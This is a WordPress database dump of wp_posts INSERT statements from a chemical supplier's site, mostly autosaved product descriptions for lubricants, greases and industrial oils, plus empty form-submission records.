INSERT INTO `wp_posts` VALUES (3254, 0, '2016-12-15 05:41:56', '2016-12-15 05:41:56', '', '', '', 'publish', 'closed', 'closed', '', '3254', '', '', '2016-12-15 05:41:56', '2016-12-15 05:41:56', '', 0, 'https://www.miller-stephenson.com/nf_sub/3254/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3255, 0, '2016-12-15 13:13:46', '2016-12-15 13:13:46', '', '', '', 'publish', 'closed', 'closed', '', '3255', '', '', '2016-12-15 13:13:47', '2016-12-15 13:13:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3255/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3256, 0, '2016-12-15 17:31:11', '2016-12-15 17:31:11', '', '', '', 'publish', 'closed', 'closed', '', '3256', '', '', '2016-12-15 17:31:12', '2016-12-15 17:31:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3256/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3257, 0, '2016-12-15 20:55:09', '2016-12-15 20:55:09', '', '', '', 'publish', 'closed', 'closed', '', '3257', '', '', '2016-12-15 20:55:09', '2016-12-15 20:55:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3257/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3258, 0, '2016-12-15 21:56:10', '2016-12-15 21:56:10', '', '', '', 'publish', 'closed', 'closed', '', '3258', '', '', '2016-12-15 21:56:10', '2016-12-15 21:56:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/3258/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3259, 0, '2016-12-16 14:42:44', '2016-12-16 14:42:44', '', '', '', 'publish', 'closed', 'closed', '', '3259', '', '', '2016-12-16 14:42:45', '2016-12-16 14:42:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/3259/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3260, 0, '2016-12-16 17:38:31', '2016-12-16 17:38:31', '', '', '', 'publish', 'closed', 'closed', '', '3260', '', '', '2016-12-16 17:38:31', '2016-12-16 17:38:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/3260/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3261, 265, '2016-12-16 18:12:33', '2016-12-16 18:12:33', '', '', '', 'publish', 'closed', 'closed', '', '3261', '', '', '2016-12-16 18:12:33', '2016-12-16 18:12:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/3261/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3262, 2, '2016-12-16 20:27:39', '2016-12-16 20:27:39', '<h3>MS-124H Connector Lubricants</h3>\n&nbsp;\n\nCleans, lubricates and protects multi-pin connectors.\n<h4>Advantages of MS-124H Connector:</h4>\n<ul>\n 	<li>Reduces insertion forces</li>\n 	<li>Greatly increases mating cycles (especially important where high pin counts are involved)</li>\n 	<li>Extends connector life by preventing corrosion and galling</li>\n 	<li>Removes contaminates and oxides</li>\n 	<li>Forms no residue, even at high temperatures</li>\n 	<li>Is non-migrating-contains no silicones</li>\n 	<li>Available with a UV (ultraviolet) indicator</li>\n 	<li>No interference in electrical continuity</li>\n 	<li>Nonflammable</li>\n 	<li>RoHS compliant</li>\n</ul>\nThe active ingredient of Connector Lubricant is a five (5) ring polyphenyl ether (PPE) lubricant. This lubricant will help protect metal connector surfaces from excessive wear, when subjected to hundreds of mating cycles, thereby increasing the life of the connectors. It will also reduce insertion forces and provide corrosion protection in harsh environments.\n\nOnly a very thin film is required on metal surfaces; therefore, the polyphenyl ether is usually diluted in a solvent. Various solvents and different polyphenyl ether concentrations may be used.\n\nConnector Lubricant is available in a 1% (aerosol) and 2% (bulk liquid) PPE concentration. This is the proper concentration for connectors operating at room temperature where there is little or no vibration.\n\nA Spectro EN-140 4-watt Long Wave UV Lamp may be used for UV detection.\n\nPhysical Properties: 5-ring Polyphenyl Ether\n\nMaximum Operating Temperatures 140°F/60°C\n\nNote: Higher temperatures result in shorter film life.\n\nSurface Tension @ 100°F 49.9 dyne/cm\n\nOxidation &amp; Corrosion Stability @ 600°F/48 hrs Steel (mg/∆) 0.02 Silver (mg/∆) 0.03 Copper (mg/∆) 0.14 Aluminum (mg/∆) 0.04 Acid Change ∆ 0.00 Thermal Stability 847°F/453°C Refractive Index @ 25°C 1.630 Note: Test for compatibility before use.\n\n&nbsp;', 'MS-124H', 'Same general applications as Connector Lubricant, MS-381HC but with a 5-ring polyphenyl ether lubricant. Thermal stability to 600°F/316°C. This 5-ring PPE can provide a 20-year film life provided that temperatures do not exceed 140°F/60°C. Contains no silicones and is non-migrating. Available with an ultraviolet (UV) indicator. Nonflammable. No ODC (ozone depleting chemicals).', 'inherit', 'closed', 'closed', '', '1673-autosave-v1', '', '', '2016-12-16 20:27:39', '2016-12-16 20:27:39', '', 1673, 'https://www.miller-stephenson.com/1673-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3263, 0, '2016-12-19 01:42:06', '2016-12-19 01:42:06', '', '', '', 'publish', 'closed', 'closed', '', '3263', '', '', '2016-12-19 01:42:07', '2016-12-19 01:42:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3263/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3264, 0, '2016-12-19 11:14:46', '2016-12-19 11:14:46', '', '', '', 'publish', 'closed', 'closed', '', '3264', '', '', '2016-12-19 11:14:46', '2016-12-19 11:14:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/3264/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3265, 0, '2016-12-19 13:16:29', '2016-12-19 13:16:29', '', '', '', 'publish', 'closed', 'closed', '', '3265', '', '', '2016-12-19 13:16:29', '2016-12-19 13:16:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/3265/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3267, 2, '2016-12-19 17:54:16', '2016-12-19 17:54:16', '<h3>Miller-Stephenson Penetrating Oil</h3>\nMiller-Stephenson\'s Penetrating Oil is fast acting to free rusted nuts and bolts, hinges, locks, pipe threads, chains, clamps and latches. The low surface tension carrier solvent and synthetic lubricating oil penetrate the tightest crevices. Apply the Penetrating Oil liberally and allow to soak for a few minutes. If the parts are heavily rusted, tapping or vibrating the parts will help. Contains no silicones. Safe for all metals as well as plastics and elastomers.\n<h4>Properties of Synthetic Penetrating Oil:</h4>\nKinematic Viscosity, cSt@212°F/100°C: 1.7\n\nKinematic Viscosity, cSt@104°F/40°C: 5.1\n\nKinematic Viscosity, cSt@-40°F/-40°C: 260\n\nPour Point -99°F/-73°C\n\nPlastic Compatibility:\n\n(Immersion: 15 minutes at Room Temperature)\n<ul>\n 	<li>Acetal</li>\n 	<li>Polyethylene</li>\n 	<li>Polypropylene</li>\n 	<li>Liquid Crystal Polymer</li>\n 	<li>Polyester, PBT, PET</li>\n 	<li>Epoxy</li>\n 	<li>Polysulfone, PSO</li>\n 	<li>PEK, PEEK</li>\n 	<li>Polyimides</li>\n 	<li>Teflon®, PTFE</li>\n 	<li>Phenolic</li>\n 	<li>Polyvinylchloride</li>\n</ul>\nNOTE: Acrylics, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\n\nELASTOMER COMPATIBILITY:\n\n(Immersion: 15 minutes at Room Temperature)\n<ul>\n 	<li>Butyl Rubber Natural Rubber</li>\n 	<li>Polysulfide EPDM</li>\n 	<li>Buna S Buna N</li>\n 	<li>Neoprene Urethane</li>\n 	<li>Chlorosulfonated PE Silicone</li>\n 	<li>Viton®B</li>\n</ul>\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Test for compatibility before use.\n\nMETAL COMPATIBILITY:\n\n(Immersion: 2 weeks at 99°F/37°C)\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Iron</li>\n</ul>\nNote: Test for compatibility before use. This product is odorless, and has a low order of toxicity.\n\nSafety Data Sheets (SDS) are available upon request.', 'Penetrating Oil', '<strong>Synthetic lubricating oil to penetrate the tightest crevices</strong>\n\nThe penetrating oil is fast-acting to free rusted nuts and bolts, hinges, locks, pipe threads, chains, clamps and latches. Contains no silicones. Safe for all metals as well as plastics and elastomers.', 'inherit', 'closed', 'closed', '', '1729-autosave-v1', '', '', '2016-12-19 17:54:16', '2016-12-19 17:54:16', '', 1729, 'https://www.miller-stephenson.com/1729-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3268, 0, '2016-12-20 13:48:43', '2016-12-20 13:48:43', '', '', '', 'publish', 'closed', 'closed', '', '3268', '', '', '2016-12-20 13:48:44', '2016-12-20 13:48:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/3268/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3269, 274, '2016-12-20 17:57:55', '2016-12-20 17:57:55', '', '', '', 'publish', 'closed', 'closed', '', '3269', '', '', '2016-12-20 17:57:55', '2016-12-20 17:57:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3269/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3272, 0, '2016-12-21 13:28:26', '2016-12-21 13:28:26', '', '', '', 'publish', 'closed', 'closed', '', '3272', '', '', '2016-12-21 13:28:26', '2016-12-21 13:28:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3272/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3273, 0, '2016-12-21 13:33:46', '2016-12-21 13:33:46', '', '', '', 'publish', 'closed', 'closed', '', '3273', '', '', '2016-12-21 13:33:47', '2016-12-21 13:33:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/3273/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3274, 2, '2016-12-21 13:53:52', '2016-12-21 13:53:52', '<h3>Teflon Heavy Equipment Grease Formulated for extreme conditions encountered in highway construction, farming, mining and trucking</h3>\nHeavy Equipment Grease with Teflon™ fluoropolymer is formulated to meet the extreme conditions encountered on off-highway construction equipment, as well as the demands of heavy equipment used in farming, mining and trucking. Formulated with high viscosity base oils, thickened with a lithium complex binder, and fortified with both molybdenum disulfide and Teflon™ fluoropolymer to deliver load carrying and anti-wear\nperformance.\n\nHeavy Equipment Grease with Teflon™ fluoropolymer contains a blend of extreme pressure and anti-wear additives, and rust and oxidation inhibitors for wet conditions. A dropping point of 500ºF (260ºC) ensures retention in high temperature applications. Recommended operating temperature range: -10ºF (-23ºC) to 350ºF (177ºC).\n\nNote: not recommended for automotive applications.\n\nFeatures:\n\n• Film strength &amp; mechanical stability\n• Protection against wear &amp; shock loads\n• Low water washout (5%)\n• Operating temperature range: -10ºF (-23ºC) to 350ºF (177ºC)\n• Contains 3% molybdenum\n• Meets NLGI #2\n\nDirections For Use:\nFor best results, remove old grease before applying.', 'Teflon Heavy Equipment Grease', 'DuPont® Heavy Equipment Grease with Teflon® fluoropolymer is formulated to meet the extreme conditions encountered on off-highway construction equipment, as well as the demands of heavy equipment used in farming, mining and trucking. Formulated with high viscosity base oils, thickened with a lithium complex binder, and fortified with both molybdenum disulfide and Teflon® fluoropolymer to deliver load carrying and anti-wear performance.\n\nContains 3% molybdenum.\n\nNote: not recommended for automotive applications.', 'inherit', 'closed', 'closed', '', '1097-autosave-v1', '', '', '2016-12-21 13:53:52', '2016-12-21 13:53:52', '', 1097, 'https://www.miller-stephenson.com/1097-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3275, 2, '2016-12-21 15:18:33', '2016-12-21 15:18:33', '<h3>Teflon High Temp Grease | Red synthetic blend extreme-pressure, high-speed grease</h3>\nHigh Temp Grease with Teflon™ fluoropolymer is a lithium complex, semisynthetic grease. This grease has a dropping point in excess of 500°F, which insures optimal retention in high temperature applications.  Formulated with carefully chosen additives, including Teflon™ fluoropolymer, to insure high film strength, and extreme pressure and anti-wear properties. Operating temperature range: -40ºF (-40°C) to 350ºF (177°C).\n\nSemi-synthetic base oils, combined with anti-oxidants and corrosion inhibitors enhance the performance in drum and high-temp disc brake wheel bearings, fifth wheels, chassis components, U-joints, king pins, clutch bearings, ball and roller bearings. Cross-over industrial uses include applications where lithium, lithium complex and extreme pressure greases are specified.\n\n<strong>Features</strong>\n\n• Film strength and durability\n• Withstands extreme pressure and heavy loads\n• Water washout (7%)\n• Extreme pressure and anti-wear properties\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\n• Contains rust and corrosion inhibitors\n• Meets NLGI #2 Service Classification GC-LB (ASTM D-4950)', 'Teflon High Temp Grease', 'DuPont® High Temp Grease with Teflon® fluoropolymer is a lithium complex, semi synthetic grease. This grease has a dropping point in excess of 500°F, which insures optimal retention in high temperature applications. Formulated with carefully chosen additives, including Teflon® fluoropolymer, to insure high film strength, and extreme pressure and anti-wear properties.\n\nContains rust and corrosion inhibitors.', 'inherit', 'closed', 'closed', '', '1102-autosave-v1', '', '', '2016-12-21 15:18:33', '2016-12-21 15:18:33', '', 1102, 'https://www.miller-stephenson.com/1102-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3276, 2, '2016-12-22 13:19:58', '2016-12-22 13:19:58', '<h3>Teflon Multi Use | High-performance general purpose lubricant with extreme corrosion and wear protection</h3>\nTeflon Multi-Use Lubricant is a water repelling, rust-resisting lubricant. Enhanced with Teflon™ fluoropolymer for optimum performance.\n<ul>\n 	<li>Features Teflon™ fluoropolymer for enhanced wear protection and lubricity.</li>\n 	<li>Contains calcium sulfonate for improved corrosion protection.</li>\n 	<li>Designed for general purpose use.</li>\n 	<li>Water-repelling silicone-free formula protects against rust.</li>\n 	<li>Formulated with Teflon™ fluoropolymer to deliver longer lubricant life, higher temperature stability, and better resistance to water and chemical contaminants.</li>\n 	<li>Provides extreme pressure wear protection.</li>\n 	<li>Resists extreme cold temperatures (to -30°F)</li>\n</ul>\n<strong>Ideal For Use in Applications Where:</strong>\n<ul>\n 	<li>Parts are exposed to extreme cold, hot or outdoor conditions.</li>\n 	<li>High moisture applications where other lubricants are quickly washed off.</li>\n 	<li>Parts need to be coated to prevent rust &amp; corrosion.</li>\n 	<li>High RPM chains like motorcycle, ATV, Go-Kart, etc</li>\n</ul>\n<h4><strong>Outstanding Features of Teflon Multi-Use:</strong></h4>\n<ul>\n 	<li>Exceptional anti-corrosion characteristics.</li>\n 	<li>Temperature Range: -30°F to +300°F.</li>\n 	<li>Provides superior anti-stick and EP properties.</li>\n 	<li>Outstanding adhesion and long lubricant life.</li>\n 	<li>Water repelling, protects against rust and corrosion.</li>\n 	<li>Contains no silicones.</li>\n 	<li>Non-staining film</li>\n</ul>\n<strong>Typical Applications:</strong>\n<ul>\n 	<li>Hinges</li>\n 	<li>Mechanical Chains</li>\n 	<li>Springs</li>\n 	<li>Cables, Rollup Doors, Sliding Tracks, Pivots, Cams and Pulleys. Threaded Parts, Conveyor Rollers, Wheels, Windows, Locks and Latches. Hitches, Winches, Ramps, Gates, Tools &amp; Table Saws</li>\n</ul>\n<strong>Properties of Material</strong>\n\n<strong>Base Lubricant</strong>\nPerformance Grade Lubricating Wax\nPTFE (Polytetrafluoroethylene)\nSynthesized Calcium Stearate\nAnti-wear Additives\nRust &amp; Corrosion Inhibitors\n<strong>Appearance</strong>\nNearly clear\n<strong>Flash Point</strong>\nAerosol: not available\nBulk Liquid: not available\n<strong>NFPA Flammability Rating</strong>\n3 (Highly Flammable)\n\n<strong>Directions For Use</strong>\n\n1. Provide adequate ventilation. Do not use near open flames.\n2. Shake or stir well before use to mix solids.\n3. Spray or brush the product on uniformly.\n4. For precision application use extension straw.', 'Teflon Multi-Use', 'This light semi-dry lubricant features a calcium sulfonate thickener and Teflon fluoropolymer for enhanced wear and corrosion protection. Use to eliminate squeaks, prevent rust and protect moving parts.', 'inherit', 'closed', 'closed', '', '1801-autosave-v1', '', '', '2016-12-22 13:19:58', '2016-12-22 13:19:58', '', 1801, 'https://www.miller-stephenson.com/1801-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3277, 2, '2016-12-21 15:35:21', '2016-12-21 15:35:21', '<h3>Teflon Severe Service Grease | High performance grease for factory application</h3>\nSevere Service Grease with Teflon™ fluoropolymer is an industrial grade grease formulated for maximum water repellency and boundary lubrication protection. This grease provides lubricity, thermal stability (-40ºF to 350ºF), and rust and corrosion protection, especially in salt water and high moisture applications. Water washout and mechanical stability properties surpass lithium complex greases, making this grease ideal for high load and high contamination applications.\n\nThis multi-functional industrial grease is well suited for most industrial applications, and especially for high temperature bearings, bushings, and gear couplings used in mining, steel mill and construction equipment. A dropping point of 572ºF (300ºC) ensures optimal retention in these high temperature applications.\n\nNote: Not recommended for automotive bearing applications\n\n<strong>Features</strong>\n\n• Improves service life\n• Withstands extreme pressures, high heat, shock loads and continuous vibration\n• Low water washout (2.75%)\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\n• Contains rust and corrosion inhibitors to protect against the effects of salt water\n• Meets NLGI #2', 'Teflon Severe Service Grease', 'DuPont® Severe Service Grease with Teflon® fluoropolymer is an industrial grade grease formulated for maximum water repellency and boundary lubrication protection. This grease provides lubricity, thermal stability (-40ºF to 350ºF), and rust and corrosion protection, especially in salt water and high moisture applications. Water washout and mechanical stability properties surpass lithium complex greases, making this grease ideal for high load and high contamination applications.\n\nNote: Not recommended for automotive bearing applications.', 'inherit', 'closed', 'closed', '', '1104-autosave-v1', '', '', '2016-12-21 15:35:21', '2016-12-21 15:35:21', '', 1104, 'https://www.miller-stephenson.com/1104-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3278, 2, '2016-12-21 15:41:38', '2016-12-21 15:41:38', '<h3>Teflon Silicone Lubricant | Clean non-staining formula is safe for most plastic, rubber, vinyl, wood and metal</h3>\n<strong>Performance of Material</strong>\nOnce solvent carrier evaporates, the residual silicone coating will exhibit the following performance characteristics:\nViscosity at 25°C, approx. 350 mm/s\nFlash Point (closed cup), approx. &gt; 572°F (300°C)\nFreezing Point, approx. -58°F (-50°C)\nThermal Conductivity, approx. 0.16 W/m°C\nSurface Tension at 25°C, approx. 21.1 mN/m\nDielectric strength at 25°C, approx. 16 kV/mm\n\n<strong>Product Description</strong>\n\n• Performs in extreme temps from -40°F (-40°C) to 400°F (204°C).\n• Formulated with Teflon™ fluoropolymer to outperform other Silicone Sprays in both metal and non-metal applications.\n• Waterproofs, protects, lubricates and preserves rubber, plastic, vinyl, leather, metal &amp; wood. Seals out moisture.\n• Eliminates squeaking and binding in windows, conveyors, fan belts, hinges, locks, cables, etc. Good low tech mold release agent.\n• Helps prevent rust, oxidation and corrosion on all metals.\n• Helps prevent build up of glues, inks, paints, waxes, etc.\n• Protects O-rings, fishing gear, tools, and farm equipment from salt, chlorine and corrosives.\n• Prevents snow sticking and muddy buildups on shovels, snow plows, etc.\n• Clean, non-staining and odorless.\n• Good dielectric properties. Excellent lubricity.\n• Good resistance to high &amp; prolonged shear stress.\n• NSF H-2 Approved.\n\n<strong>Typical Applications of Te:</strong>\n\n• Use on hinges, locks, latches, springs, plastic gears, rollers, drawer guides and other sliding parts. Conveyors, assemblies, heat sealers, cutting tables, slicing equipment, tools, dies, tuners, switches, fan belts &amp; rubber moldings. Waterproofs leather and protects vinyl.\n\n<strong>Directions For Use:</strong>\n\n1. Provide adequate ventilation. Do not use near open flames.\n2. Shake well before using.\n3. Either spray or brush on a light, even coat. Repeat for heavy-duty applications.\n\nNote: When waterproofing leather or sensitive materials test on an inconspicuous area.\nDo NOT use on floors or automotive pedals, MAY CAUSE SLIPPING OR FALLS.\n\n<strong>Properties of Material:</strong>\n\nBase Lubricant: Premium Grade Silicone Polymer, PTFE (Polytetrafluoroethylene)\nAppearance: Colorless, Odorless, Limpid Liquid\nFlash Point: Aerosol: 0°F (-18°C), Bulk Liquid: 15°F (-9°C)\nNFPA Flammability Rating: 3 (Highly Flammable)\n\n&nbsp;\n\n&nbsp;', 'Teflon Silicone Lubricant', 'A clean, light-duty product, DuPont™ Silicone Lubricant with Teflon® Fluoropolymer is excellent for non-metal materials that may be damaged by conventional lubricants. It helps prevent sticking, binding and freezing.', 'inherit', 'closed', 'closed', '', '1819-autosave-v1', '', '', '2016-12-21 15:41:38', '2016-12-21 15:41:38', '', 1819, 'https://www.miller-stephenson.com/1819-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3279, 2, '2016-12-21 15:48:16', '2016-12-21 15:48:16', '<h3>Teflon White Lithium Grease | A clean, white general purpose grease for demanding applications</h3>\nWhite Lithium Grease with Teflon™ fluoropolymer is formulated with a special additive package which insures high film strength, extreme pressure (EP) and anti-wear properties as well as corrosion prevention. This is a clean, white, low odor grease, making it user friendly.\n\nThis general purpose grease provides long lasting protection in a broad range of applications and operating conditions. With a high dropping point in excess of 500°F, this grease ensures retention where high temperatures are encountered. Recommended Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC).\n\nUses include chassis, seat tracks, speedometer cables, trunk &amp; hood latches, door hinges, stop latches, assembly applications, garage doors, conveyor bearings, and more.\n\n<strong>Features:</strong>\n\n• Film strength and durability\n• Protection against oxidation &amp; corrosion\n• Water washout (7%)\n• Extreme pressure and anti-wear properties\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\n• Meets NLGI #2', 'Teflon White Lithium Grease', 'DuPont® White Lithium Grease with Teflon® fluoropolymer is formulated with a special additive package which insures high film strength, extreme pressure (EP) and anti-wear properties as well as corrosion prevention. This is a clean, white, low odor grease, making it user friendly.\nThis general purpose grease provides long lasting protection in a broad range of applications and operating conditions. With a high dropping point in excess of 500°F, this grease ensures retention where high temperatures are encountered.', 'inherit', 'closed', 'closed', '', '1106-autosave-v1', '', '', '2016-12-21 15:48:16', '2016-12-21 15:48:16', '', 1106, 'https://www.miller-stephenson.com/1106-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3280, 2, '2016-12-21 15:59:01', '2016-12-21 15:59:01', '<h3>TriboSys 214X &amp; 215X Gear Box Lubricants</h3>\nThese Gear Box Lubricants deliver maximum protection against friction, wear and heavy shock loads. They have the excellent ability to absorb and remove heat from gear surfaces with minimal effect on gear oil performance.\n\nThe proprietary additive system of gear oils provide for extended drain intervals. Synthetic (214X Series) and synthetic blends (215X Series) will outlast conventional gear oils and reduce waste oil disposal.\n\nThey offer exceptional protection when subjected to extreme loads, speeds, temperature and environmental influences. They are cost effective and are designed to control and reduce maintenance cost\n\nAdvantages:\n<ul>\n 	<li>Lower Energy Costs</li>\n 	<li>Increased Gear Box Efficiency</li>\n 	<li>High Operating Stability</li>\n 	<li>Non-corrosive to steel, copper, aluminum, bronze and bearing alloys.</li>\n 	<li>Immediate Leakage Reduction</li>\n 	<li>Demulsibility</li>\n</ul>\nThese oils have multi-purpose service. In addition to gear drive usage, these oils are used in bearing baths and reservoirs, on ways and slides, and all other applications specifying a gear lubricant. Low temperature operating ranges assures easy and smooth cold startups. These multi viscosity oils minimize oil inventory and incorrect oil selection. Each gear oil has superior adhesive properties to resist fling-off and leakage. Excellent water separation permits easy drain-off for uninterrupted year-round operation.', 'TriboSys 214X', '<strong>Gear Box Lubricants</strong>\n<br /><br />\nThese oils deliver maximum protection against friction, wear and heavy shock loads. They have the excellent ability to absorb and remove heat from gear surfaces with minimal effect on gear oil performance.', 'inherit', 'closed', 'closed', '', '1643-autosave-v1', '', '', '2016-12-21 15:59:01', '2016-12-21 15:59:01', '', 1643, 'https://www.miller-stephenson.com/1643-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3281, 2, '2016-12-21 16:11:03', '2016-12-21 16:11:03', 'TriboSysCompressor Lubricant\n\nThese compressor lubricant (s) substantially, and consistently, reduce friction. Field studies show 5% to 15% savings in electrical consumption, which provides greater compressor reliability. They have better polar film lubricity and lower volatility than conventional oils. These features permit lower cylinder feed rates with less oil carryover into the air stream, and more complete air/oil separation. The result is cleaner system air, reducing problems in air operated equipment and manufacturing processes.\n\n<strong>Rotary Compressors</strong>\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\n\n<strong>Reciprocating Compressors</strong>\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\n\n<strong>Compatibility</strong>\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product', 'TriboSys 216X | Compressor Lubricant', '<strong>Compressor Lubricant</strong>\n<br /><br />\nThese compressor oils substantially, and consistently, reduce friction. Field studies show 5% to 15% savings in electrical consumption, which provides greater compressor reliability. They have better polar film lubricity and lower volatility than conventional oils. These features permit lower cylinder feed rates with less oil carryover into the air stream, and more complete air/oil separation. The result is cleaner system air, reducing problems in air operated equipment and manufacturing processes.', 'inherit', 'closed', 'closed', '', '1644-autosave-v1', '', '', '2016-12-21 16:11:03', '2016-12-21 16:11:03', '', 1644, 'https://www.miller-stephenson.com/1644-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3282, 2, '2016-12-21 16:09:30', '2016-12-21 16:09:30', '', 'Compressor Lubricant', '', 'inherit', 'closed', 'closed', '', 'shutterstock_537008896', '', '', '2016-12-21 16:09:42', '2016-12-21 16:09:42', '', 1644, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_537008896.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3283, 2, '2016-12-21 16:15:44', '2016-12-21 16:15:44', 'These synthetically blended hydraulic oils provide maximum anti-wear protection for high pressure, high performance systems. The natural high viscosity indexes and the sophisticated hydraulic additive packages provide maximum oil cohesiveness, resulting in leakage reduction up to 90%.\n\nThese hydraulic oils increase drain intervals-typically 3 to 5 times longer than conventional oils, reducing waste disposal costs. The pressure and temperature stability permit continuous, around the clock system operation, without loss of equipment efficiency. These high performance oils increase production output and profit.\n\n<strong>Advantages</strong>\n<ul>\n 	<li>Anti-Wear-extended pump and component life</li>\n 	<li>Anti-Leak-Immediate leakage reduction up to 90%</li>\n 	<li>Superior Water and Oil Separation-Vent and drain for uninterrupted service</li>\n 	<li>Non-Foaming-Eliminate system chatter and erratic operation, minimizing production errors</li>\n 	<li>Rust and Corrosion Protection</li>\n 	<li>No sludge, varnish or gummy deposits</li>\n 	<li>High Performance-High pressure rating</li>\n 	<li>Reduced Operating Temperatures</li>\n 	<li>Power Reduction of 2-6% Average</li>\n 	<li>Seal, Gasket and Component Compatibility</li>\n 	<li>Superior Filterability</li>\n</ul>', 'TriboSys 217X | Hydraulic Oils', '<strong>Hydraulic Oils</strong>\n<br /><br />\nThese synthetically blended hydraulic oils provide maximum anti-wear protection for high pressure, high performance systems. The natural high viscosity indexes and the sophisticated hydraulic additive packages provide maximum oil cohesiveness, resulting in leakage reduction up to 90%.', 'inherit', 'closed', 'closed', '', '1645-autosave-v1', '', '', '2016-12-21 16:15:44', '2016-12-21 16:15:44', '', 1645, 'https://www.miller-stephenson.com/1645-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3284, 2, '2016-12-21 16:58:28', '2016-12-21 16:58:28', '<h3>TriboSys 212X | High Temperature Chain Oils</h3>\nPowerful penetrating chain oils for applications where the lubricant penetrates to reach the pins and bushings located within roller chains. Additional applications include hinges, castors, rollers, bolts, screw assemblies, bushings and cable.\n\n<strong>2120</strong>\nThis chain oil exhibits excellent anti-wear characteristics and power savings through friction reduction. It is an ashless, smokeless product with no carbon, varnish or gummy residue at higher and continuous temperatures up to 525˚F/274˚C.\n\n<strong>2121</strong>\nA combination of synthetic oils and submicron molybdenum disulfide for maximum lubrication of all moving parts on all chain designs. The synthetic fluids have a powerful cleaning action that breaks down and dissolves prior carbon, varnish and gum buildup.\n\n<strong>Advantages</strong>\n<ul>\n 	<li>Energy Efficient</li>\n 	<li>Anti-Wear</li>\n 	<li>Ashless-No Residue</li>\n 	<li>Extends Chain and Track Life</li>\n</ul>\n<strong>Typical Applications</strong>\n<ul>\n 	<li>High Temperature Ovens</li>\n 	<li>Tunnels</li>\n 	<li><span style="font-size: 14.4px;">Reflow Ovens</span></li>\n 	<li>Dryers</li>\n 	<li>Tenter Frames</li>\n 	<li>Shrink Wrap Machines</li>\n 	<li>Textile Auxiliaries</li>\n 	<li>Steel</li>\n 	<li>Plastic</li>\n 	<li>Printing</li>\n 	<li>Woodworking Processes</li>\n</ul>\n&nbsp;', 'TriboSys 212X | High Temperature Chain Oils', '<strong>High Temperature Chain Oils</strong>\n\nPowerful penetrating chain oils for applications where the lubricant penetrates to reach the pins and bushings located within roller chains. Additional applications include hinges, castors, rollers, bolts, screw assemblies, bushings and cables.', 'inherit', 'closed', 'closed', '', '1638-autosave-v1', '', '', '2016-12-21 16:58:28', '2016-12-21 16:58:28', '', 1638, 'https://www.miller-stephenson.com/1638-autosave-v1/', 0, 'revision', '', 0); 
